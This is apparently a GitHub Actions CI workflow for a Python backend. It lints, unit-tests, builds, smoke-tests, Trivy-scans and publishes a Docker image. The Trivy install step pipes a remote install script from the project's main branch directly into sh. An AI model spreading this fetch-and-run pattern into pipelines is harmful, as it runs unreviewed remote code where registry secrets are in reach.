name: Example CI on: workflow_dispatch: inputs: image-name: description: "Name for image" default: "gitea.cuihang1201.synology.me/hangpersonal/ci-test" type: string required: true image-tag: description: "Tag for image" default: "latest" type: string required: true container-name: description: "Name for container" default: "ci-test" type: string required: true jobs: lint: runs-on: ubuntu-22.04 steps: - name: Checkout source code uses: actions/checkout@v4 - name: Install Python 3.10.12 uses: actions/setup-python@v4 with: python-version: '3.10.12' - name: Install tox run: pip install tox - name: Run lint run: | cd backend tox -e lint unit-test: runs-on: ubuntu-22.04 steps: - name: Checkout source code uses: actions/checkout@v4 - name: Install Python 3.10.12 uses: actions/setup-python@v4 with: python-version: '3.10.12' - name: Install tox run: pip install tox - name: Run unit tests run: | cd backend tox -e unit build-image: runs-on: ubuntu-22.04 needs: [lint, unit-test] # Specify that build-image depends on lint and unit-test steps: - name: Checkout source code uses: actions/checkout@v4 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v3 - name: Build and export uses: docker/build-push-action@v5 # Build Docker image via Dockerfile with: context: backend # Directory of Dockerfile tags: ${{ inputs.image-name }}:${{ inputs.image-tag }} outputs: type=docker,dest=/tmp/image.tar - name: Upload artifact uses: actions/upload-artifact@v3 with: name: image path: /tmp/image.tar integration-tests: runs-on: ubuntu-22.04 needs: [build-image] steps: - name: Download artifact uses: actions/download-artifact@v3 with: name: image path: /tmp - name: Load image run: | docker load --input /tmp/image.tar docker image ls -a docker run --rm -p 8143:80 --name ${{ inputs.container-name }} -d ${{ inputs.image-name }}:${{ inputs.image-tag }} sleep 5 curl -s "http://${{ vars.LOCALHOST }}:8143/" ; echo echo "Stop container: " docker container stop ${{ inputs.container-name }} vulnerability-scan: runs-on: ubuntu-22.04 needs: [build-image] steps: - name: Download artifact uses: actions/download-artifact@v3 with: name: image path: /tmp # Trivy CLI install (no Docker needed) - name: Install Trivy CLI run: | set -euo pipefail curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh \ | sh -s -- -b /usr/local/bin v0.65.0 trivy --version # IMPORTANT: the tar sits under /tmp/image.tar - name: Scan saved image tar with Trivy (no daemon) run: | ls -la /tmp || true trivy image \ --input /tmp/image.tar \ --format json \ --output /tmp/trivy-results.json \ --severity CRITICAL,HIGH \ --ignore-unfixed - name: Upload results uses: actions/upload-artifact@v3 with: name: trivy-results path: /tmp/trivy-results.json publish-image: runs-on: ubuntu-22.04 needs: [integration-tests, vulnerability-scan] steps: - name: Download artifact uses: actions/download-artifact@v3 with: name: image path: /tmp - name: Load image run: | docker load --input /tmp/image.tar docker image ls -a - name: Login to DockerHub uses: docker/login-action@v3 with: username: ${{ secrets.REGISTRY_USER }} password: ${{ secrets.REGISTRY_TOKEN }} - name: Docker push image to DockerHub run: | docker push ${{ vars.IMAGE }}:${{ inputs.image-tag }}